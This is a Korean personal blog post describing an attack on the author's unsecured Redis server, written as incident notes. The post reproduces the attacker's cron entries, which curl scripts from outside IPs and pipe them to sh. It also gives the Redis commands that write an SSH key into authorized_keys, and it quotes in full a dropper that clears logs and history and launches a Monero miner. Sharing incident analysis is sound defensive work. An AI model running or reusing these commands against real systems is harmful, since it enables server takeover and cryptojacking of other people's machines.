티스토리 뷰
관리하고 있던 리눅스 서버를 점검중에 침입 시도를 발견하여 글로 남겨봅니다. 자세한 분석은 다음에..
Redis를 암호를 걸어두지 않고 원격접속을 허용하여 두었더니 침입 시도를 발견하였습니다.
검색해보니 이런 비슷한 방법인 듯 : http://blog.pages.kr/2198
http://antirez.com/news/96
https://www.v2ex.com/t/234520#reply25
발견한 사항
redis 서버에 새로운 key값 3개가 생성되어 있었음.
1. aaivwlczyp
*/1 * * * * /usr/bin/curl -fsSL http://64.140.174.129:8220/test9.sh | sh
2. uioottsohz
*/1 * * * * /usr/bin/curl -fsSL http://64.140.174.129:8220/test9.sh | sh
3. crackit
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDE0guChoiGr6s3mXjQA0wX6YKNNMy2bpj6b8ArjuWH/mjN17bu275t/ZlSarmMC5hCVAx7eJEzqxqy43AiBS61UuFpWZXWal5b6XWdvrH6pCJOI5+ceeFMEmc64B7GNrs2OPyuaP0HST/xh0YyWwoE/2uZmc3EyiR8sIP7/11N+xhHH4nIZB/M8QDaBRN6DWUNd/kzLDuIHr4LntuhKEZpCuQIuiDm7ZBYzbYhGtpPWnO04FzbfMUqP1JssTd/G/mUflRgQhKVACyF8rd8o/o7Zy6I9JVgLV6FpNOLc5Ep9VJuFXxmcxWc+Bj//Sd4pgn4gbmb8GzAvlH2xxw+SV2h redis@redis.io
sh 쉘 스크립트 파일은 다운받아보려고 시도했으나 서버를 닫았는지 실패.
http 80 포트는 접근할 수 없었고, PING은 응답이 있다.
http://www.ip-tracker.org/locator/ip-lookup.php?ip=64.140.174.129
IP Locator
IP Lookup for: 64.140.174.129
IP Location: Ogden (Utah)
in United States
검색해보니 북미 솔트레이크 시티 근처로 IP가 확인.
중국쪽 공격인줄 알았는데 key값이 crackit인걸 보면 학생이거나 이쪽계통 사람이 해킹을 시도한 것으로 보임.
server에 등록된 user의 private key값을 탈취하는 것이 가능하다는 것을 확인.
핵심 명령어만 적어놓아 본다. target ip는 192.168.1.11
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
192.168.1.11:6379> config set dbfilename "backup.rdb"
192.168.1.11:6379> save
$ redis-cli -h 192.168.1.11 echo flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized.keys"
192.168.1.11:6379> save
출처 : http://blog.pages.kr/2198
생각보다 간단한 것 같다.
이후에는 그냥 ssh tunnel 이용하여 접속하기로 결정했습니다.
cron job 처럼 생긴 sh 실행 구문은 어떻게 실행하려고 했는지 궁금하다.
누군가 알려주셨으면..
2017.08.27.
뭔가 또 당한 느낌인데 .sh 내용을 볼 수 있었다.
*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh
http://98.142.140.13:8220/test11.sh
#!/bin/bash
(ps auxf|grep -v grep|grep minerd |awk '{print $2}'|xargs kill -9;crontab -r;pkill -9 minerd;pkill -9 i586;pkill -9 gddr;echo > /var/log/wtmp;history -c;cd ~;curl -L http://98.142.140.13:8220/minerd -o minerd;chmod +x minerd;setsid /root/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)
모네로 마이닝을 돌리려는 심산인듯..
저번에 조회한 주소지랑 비슷하다
Advertisements IP Lookup Result From IP Locator on IP Map | IP Locator & IP Lookup Basic Tracking Info
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
'Study > Lnix / Uinux' 카테고리의 다른 글
Linux 최적화 (0) | 2012.02.05 |
---|---|
CentOS에 mod_cband 설치 (0) | 2009.09.14 |
Apache설정 주소끝에 /(슬래시) 없어도 리다이렉트 하도록 설정 (0) | 2009.09.02 |
- Total
- Today
- Yesterday
- 바이올렛에버가든
- .dess
- Everybody lies
- macdrive
- sparse matrix
- crackit
- AIMP3
- Windows Phone 7
- CTP
- 시작버튼
- 영랩
- palindrome
- redis
- 비트코인
- 암호화폐
- 가상화폐
- 호주
- startmenu
- 구글트렌드
- redis-server
- Google App Engine
- minidlna
- udacity
- MCITP
- 모두 거짓말을 한다
- windows 2008 server
- 골드코스트
- my book live
- jetbrains
- MCTS
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |